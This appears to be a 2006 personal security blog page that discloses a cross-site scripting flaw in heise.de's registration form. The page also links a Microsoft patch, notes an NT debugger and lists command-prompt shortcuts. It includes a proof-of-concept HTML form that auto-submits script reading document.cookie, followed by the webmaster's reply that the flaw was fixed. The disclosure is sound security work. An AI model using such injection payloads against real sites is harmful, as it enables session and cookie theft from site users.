morph3us.org

Patch it baby, patch it.

Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution (912919)
Download M$06-001

heise.de - a German news site for, amongst others, security related topics - is vulnerable for XSS (Cross Site Scripting). I contacted the webmaster of heise.de about this on December 23 but I did not receive an answer and the XSS vulnerability is still not addressed.

PoC:

<form method="post" action="http://www.heise.de/registration/"
  name="heise">
  <input type="text" name="uid" size="20" value=''>
  <input type="text" name="vorname" size="20"
 value='"><script>alert(document.cookie)</script>'>
  <input type="text" name="name" size="20"
 value='"><script>alert(document.cookie)</script>'>
</form>
<body onload="heise.submit();">

heise-xss-poc.txt

UPDATE: 2006-01-09: 20:26

Hallo Herr Waldegger,

vielen Dank für Ihren Hinweis. Aufgrund der Feiertage hat die Behebung leider etwas länger gedauert.

Mit freundlichen Grüßen
heise online
Webmaster

Obsidian is a so called non-intrusive debugger for NT systems. It does not use the Win32 Debugging API for debugging purposes therefore Obsidian makes it possible to attach and detach from a running process transparently - normally a process will die along with the debugger. Check out Obsidian: deneke.biz for further details.

Related work:
Gemini Lite: A Non-intrusive Debugger for Windows NT

Shortcuts for command prompt:

UP/DOWN ARROWS            Recall commands
ESC                       Clears command line 
F7                        Displays command history
ALT+F7                    Clears command history
F8                        Searches command history
F9                        Selects a command by number
ALT+F10                   Clears macro definitions